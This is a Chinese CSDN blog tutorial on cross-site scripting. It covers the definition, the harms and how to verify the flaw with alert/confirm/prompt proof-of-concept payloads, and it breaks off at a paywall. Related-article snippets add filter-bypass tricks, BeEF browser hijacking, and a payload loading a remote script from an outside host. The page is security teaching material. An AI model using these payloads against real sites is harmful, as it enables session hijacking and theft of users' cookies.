XSS漏洞的简介和利用

最新推荐文章于 2024-06-12 10:55:23 发布
最新推荐文章于 2024-06-12 10:55:23 发布
阅读量1.2k 收藏 2
点赞数
文章标签: xss 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46397814/article/details/107836069
版权
本文介绍了XSS(跨站脚本攻击)的概念,它是一种利用未过滤用户输入导致恶意脚本执行的安全漏洞。XSS分为反射型、存储型和DOM型,其中存储型XSS危害最为严重。文章详细讲解了XSS的构造方法,包括JavaScript伪协议和HTML标签的利用,并讨论了如何通过变形绕过过滤器。最后,文中探讨了XSS的利用场景,特别是存储型XSS的利用流程。
摘要由CSDN通过智能技术生成

跨站脚本攻击

0x01 XSS漏洞概述

XSS(Cross Site Scripting)跨站脚本攻击,因其与CSS(Cascading Style Sheet)重名,所以更名为XSS。

XSS是指攻击者利用网站未对用户提交的数据进行转义处理或者过滤不足的缺点,添加恶意脚本到Web应用界面中,使其他访问的用户访问该网站时都会执行相应的恶意嵌入代码。XSS作为OWASP TOP 10之一,主要使用Javascript来完成恶意攻击的行为,JS可以非常灵活的操控HTML/CSS浏览器,这就使得XSS的攻击空间非常大,也就是说,JS强大的灵活性为XSS攻击提供了非常广阔的攻击面。

XSS通过将精心构造的脚本代码注入到网页中,并由浏览器解释运行这一段代码以达到恶意攻击的效果。微博、留言板、聊天室等收集用户输入的地方都有可能被注入XSS代码,并存在遭受XSS的风险,只要对用户的输入内容没有做严格的过滤,就会被跨站脚本攻击。用户提交的数据会作为网页的一部分出现。

XSS漏洞的危害

  1. 从用户提交的数据中盗取各种用户账号
  2. 盗取用户Cookie资料,冒充用户身份进入网站
  3. 劫持用户会话执行任意操作
  4. 刷流量,执行弹窗广告
  5. 传播病毒(蠕虫病毒)
  6. 等等

XSS漏洞的验证
使用一段代码来验证XSS漏洞的存在,这样的代码叫做POC(Proof of Concept),代码如下:

alert(/xss/);
confirm('xss');
prompt('xss');
<script>alert(/xss/);</script>
<script>confirm(/xss/);</script>
<script>confirm('xss');</script>
<script>prompt('xss');</script>
<sCr<scrscRiptipt>ipt>OonN'"<>
<!--
<sCr<scrscRiptipt>ipt>OonN\'\"<>
-->

若浏览器页面有弹窗,证明浏览器把用户提交的字符串当作JS来执行,说明XSS漏洞存在。

XSS漏洞的分类

  1. 反射型XSS
  2. 存储型XSS</
最低0.47元/天 解锁文章
aruah
关注
xss漏洞攻防
mackilo的博客
12-20 9321
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其Web里面的html代码会被执行,从而达到恶意的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。xss是一种发生在web前端的漏洞,所以其危害的对象也主要是前端用户在WEB2.0时代,强调的是互动,使得用户输入信息的机会大增,在这个情况下,我们作为开发者,在开发的时候,要提高警惕。
XSS漏洞-01】XSS漏洞简介、危害与分类及验证
zz12345600354的博客
04-23 1072
定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本或跨站脚本攻击。跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面,当用户浏览该页之时,嵌入其Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。本质:是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。特点:XSS主要基于JavaScript。
XSS 攻击的应用方式
枫梓林のBlog
04-28 589
XSS 攻击的应用方式 文章目录XSS 攻击的应用方式0x01 反射型 XSS 攻击劫持用户浏览器1.修改页面链接的原理2.构建反射型 XSS 攻击3.使用 beef 劫持用户浏览器3.1 基本概述3.2 安装程序3.3 程序启动 beef4.Beef 模块的使用4.1 获取 Cookie4.2 给控制的僵尸浏览器弹一个窗口,效果如下0x02 持久型 XSS 窃取用户信息1.克隆登录页面2. 使用存储型 XSS 进行页面跳转3.将页面跳转到index.页面0x03 总结 实验环境 Kali 2021...
XSS漏洞检测和利用
2401_84434570的博客
04-22 1004
通过构造一些特殊的xss poc,在可能出现XSS漏洞测试点将这些语句传入网站,我们就能过够相对轻松的探测出XSS漏洞
【网络安全XSS漏洞- XSS基础概述及利用
最新发布
goldfish8848的博客
06-12 1413
跨站脚本(Cross-site Scripting)攻击,攻击者通过网站注入点注入客户端可执行解析的payload(脚本代码),当用户访问网页时,恶意payload自动加载并执行,以达到攻击者目的(窃取cookie、恶意传播、钓鱼欺骗等)为了避免与HTML的CSS相混淆,通常称它为XSS
xss跨站攻击详讲 | 如何利用xss拿下一个站?
热门推荐
向阳-Y.的博客
11-13 1万+
1.初识xxs跨站漏洞xss能干什么? 利用xss获取对方后台地址、cookie信息,得到cookie和后台地址后,能通过相关工具(比如postman)进行后台登录: 其他补充: cookie :一般用于小型网站,一般存储在自己电脑上,存活时间较长 session:采用会话模式,一般用于大型网站,一存储在服务器上,存活时间较短 2.xss的类型 2.1反射型 当在网页插入下列xss代码后,会立即回馈到屏幕,但这条xss代码并不会一直存储到该网站上 <script>alert(1)&
xsstry:xss漏洞利用平台
06-10
**XSS漏洞利用平台——深入理解XSS与CSS在安全的角色** XSS(Cross Site Scripting)漏洞是一种常见的网络安全问题,它允许攻击者在受害者的浏览器上执行恶意脚本。"xsstry"是一个用于XSS漏洞测试和利用的平台,...
DedeCMS 存储型xss漏洞1
08-03
### 漏洞利用条件 要利用漏洞,攻击者需要能够访问并操作DedeCMS后台的“系统”->“支付工具”->“配送方式设置”,在那里他们可以添加一个新的配送方式,将XSS payload 输入到“简要说明”字段。一旦数据保存...
JSP使用过滤器防止Xss漏洞
10-17
在Web开发XSS(Cross-site scripting)漏洞是一种常见的安全威胁,允许攻击者通过注入恶意脚本到网页,从而影响用户浏览器的行为。JSP(JavaServer Pages)作为常用的服务器端动态网页技术,同样需要关注XSS...
XSS多姿势执行alert
balance的博客
10-15 6517
以下归纳了多种执行alert函数的方式(前提是获得js执行上下文) ,可用xss filter bypass 1、常规alert &lt;a href="javascript:alert()"&gt;XSS Test&lt;/a&gt; 2、字符串操作 Unicode字符以"\u"开头,例如\u00A9。Unicode码位用"\u{}"表示,例如\u{2F804} 十六进制以"\x"开头,
XSS 绕过常用语句
Mr.Huang_的博客
09-16 3038
XSS 绕过常用语句 写在最前面::: 下文 alert 都可以由 prompt 代替 最常用的 XSS 漏洞测试代码: <script>prompt("XSS")</script> <SCRIPT SRC=http://damit5.ml/xss.js></SCRIPT> 在输入(Input)标签里 <INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>
安全】P 4-1 XSS跨站脚本分类
Z_David_Z的博客
02-17 388
目录0X01 XSS漏洞介绍0X02 反射型XSS0X03 存储型XSS0X04 DOM型XSS 0X01 XSS漏洞介绍 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 0X02 反射型XSS 反射型XSS又称非持久性XSS,这种攻击
XSS 常用标签及绕过姿势总结
hackzkaq的博客
08-17 6028
A位置可填充 /,/123/,%09,%0A,%0C,%0D,%20 B位置可填充 %09,%0A,%0C,%0D,%20 C位置可填充 %0B,/**/,如果加了双引号,则可以填充 %09,%0A,%0C,%0D,%20 D位置可填充 %09,%0A,%0C,%0D,%20,//,>例如 javascript:alert(1) ,进行 Unicode 编码时,只能对 alert 和 “1” 进行编码,框号编码后会被当成文本字符,不能执行。...
xss弹窗
hxxjxw的博客
12-17 6674
xss.php 能实现一个简单弹窗 &lt;html&gt; &lt;head&gt; xss test&lt;/head&gt; &lt;body&gt; &lt;script&gt; alert("xss")&lt;/script&gt; &lt;meta http-equiv="refresh" content="0;"&
xss漏洞,弹不了窗
山兔的博客
05-14 1124
xss漏洞弹不了窗,我们可以试着去获取cookie,或者插入图片
细说XSS
LainWith的博客
08-24 2060
什么是XSS 跨站脚本(Cross-Site Scripting,XSS)是一种经常出现在Web应用程序的计算机安全漏洞,是由于Web应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码(通常包括HTML代码和客户端Javascript脚本)注入到网页之,当其他用户浏览这些网页时,就会执行其的恶意代码,对受害用户可能采取Cookie资料窃取、会话劫持、钓鱼欺骗等各种攻击。 通常情况下,我们既可以把跨站脚本理解成一种Web安全漏洞,也可以理解成一种攻击手段。 XSS跨站脚本攻击本身
xss(跨站攻击)
m0_74456293的博客
03-20 2741
xss(跨站攻击)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值